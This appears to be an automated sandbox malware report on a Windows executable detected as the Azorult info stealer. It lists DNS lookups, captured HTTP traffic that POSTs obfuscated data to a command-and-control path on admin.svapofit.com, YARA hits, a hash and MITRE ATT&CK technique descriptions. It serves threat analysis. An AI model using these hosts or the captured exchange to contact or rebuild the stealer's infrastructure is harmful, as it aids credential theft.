Sep 28, 2021 00:50:07.450180054 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:07.740792990 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:07.759613991 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:08.511379957 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:08.531145096 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:17.272458076 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:17.290194988 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:20.041127920 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:20.062921047 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:35.589652061 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:35.610187054 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:45.434261084 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:45.464673996 CEST	53	50728	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:47.098167896 CEST	53777	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:47.127352953 CEST	53	53777	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:01.078258038 CEST	57106	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:01.116170883 CEST	53	57106	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:09.692076921 CEST	60352	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:09.719302893 CEST	53	60352	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:21.565736055 CEST	56773	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:21.585149050 CEST	53	56773	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:21.925509930 CEST	60982	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:21.944746017 CEST	53	60982	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:22.043229103 CEST	58058	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:22.062781096 CEST	53	58058	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:29.277057886 CEST	64367	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:29.298317909 CEST	53	64367	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:42.556973934 CEST	51539	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:42.585114956 CEST	53	51539	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:58.267992020 CEST	55393	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:58.295708895 CEST	53	55393	8.8.8.8	192.168.2.3
Sep 28, 2021 00:52:09.014669895 CEST	50585	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:52:09.045800924 CEST	53	50585	8.8.8.8	192.168.2.3
Sep 28, 2021 00:52:37.089941025 CEST	63456	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:52:37.110119104 CEST	53	63456	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 28, 2021 00:51:21.565736055 CEST	192.168.2.3	8.8.8.8	0xfa02	Standard query (0)	admin.svapofit.com	A (IP address)	IN (0x0001)
Sep 28, 2021 00:51:21.925509930 CEST	192.168.2.3	8.8.8.8	0x442	Standard query (0)	survey-smiles.com	A (IP address)	IN (0x0001)
Sep 28, 2021 00:51:22.043229103 CEST	192.168.2.3	8.8.8.8	0x1066	Standard query (0)	ww1.survey-smiles.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 28, 2021 00:51:21.585149050 CEST	8.8.8.8	192.168.2.3	0xfa02	No error (0)	admin.svapofit.com		63.141.242.43	A (IP address)	IN (0x0001)
Sep 28, 2021 00:51:21.944746017 CEST	8.8.8.8	192.168.2.3	0x442	No error (0)	survey-smiles.com		5.79.68.108	A (IP address)	IN (0x0001)
Sep 28, 2021 00:51:22.062781096 CEST	8.8.8.8	192.168.2.3	0x1066	No error (0)	ww1.survey-smiles.com	12065.BODIS.com		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 00:51:22.062781096 CEST	8.8.8.8	192.168.2.3	0x1066	No error (0)	12065.BODIS.com		199.59.242.153	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

admin.svapofit.com

survey-smiles.com

ww1.survey-smiles.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49862	63.141.242.43	80	C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 00:51:21.739099979 CEST	5919	OUT	POST /azs/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: admin.svapofit.com Content-Length: 101 Cache-Control: no-cache Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Sep 28, 2021 00:51:21.887695074 CEST	5919	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 27 Sep 2021 22:51:21 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=6f600628-1fe5-11ec-b80c-ddc39747a61b; path=/; domain=.svapofit.com; expires=Sun, 16 Oct 2089 02:05:28 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49863	5.79.68.108	80	C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 00:51:21.973798990 CEST	5920	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Host: survey-smiles.com Connection: Keep-Alive
Sep 28, 2021 00:51:22.030646086 CEST	5920	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 27 Sep 2021 22:51:21 GMT location: http://ww1.survey-smiles.com server: nginx set-cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176; path=/; domain=.survey-smiles.com; expires=Sun, 16 Oct 2089 02:05:29 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49864	199.59.242.153	80	C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 00:51:22.166258097 CEST	5921	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Connection: Keep-Alive Host: ww1.survey-smiles.com Cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176
Sep 28, 2021 00:51:22.269495964 CEST	5923	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 27 Sep 2021 22:51:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: parking_session=61c87920-28c6-e4e4-9f03-a9e204fef8f0; expires=Mon, 27-Sep-2021 23:06:22 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_eNF+XNh9GvjZqNm1u+MIZixMaMS0o4XDi5dH/YZma3b0y3KrdCRlULNNeeHOHQxvscZOqg9dOcBGbSbu4ivBKw== Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 35 35 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 4e 46 2b 58 4e 68 39 47 76 6a 5a 71 4e 6d 31 75 2b 4d 49 5a 69 78 4d 61 4d 53 30 6f 34 58 44 69 35 64 48 2f 59 5a 6d 61 33 62 30 79 33 4b 72 64 43 52 6c 55 4c 4e 4e 65 65 48 4f 48 51 78 76 73 63 5a 4f 71 67 39 64 4f 63 42 47 62 53 62 75 34 69 76 42 4b 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 Data Ascii: 559<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_eNF+XNh9GvjZqNm1u+MIZixMaMS0o4XDi5dH/YZma3b0y3KrdCRlULNNeeHOHQxvscZOqg9dOcBGbSbu4ivBKw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com"

Code Manipulations

Statistics

System Behavior

Analysis Process: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe PID: 7040 Parent PID: 6404

General

Start time:	00:49:18
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe'
Imagebase:	0x400000
File size:	208384 bytes
MD5 hash:	73BD76F0549CC1992D943DDFD92A9C4D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: kevoreilly
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Azorult

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph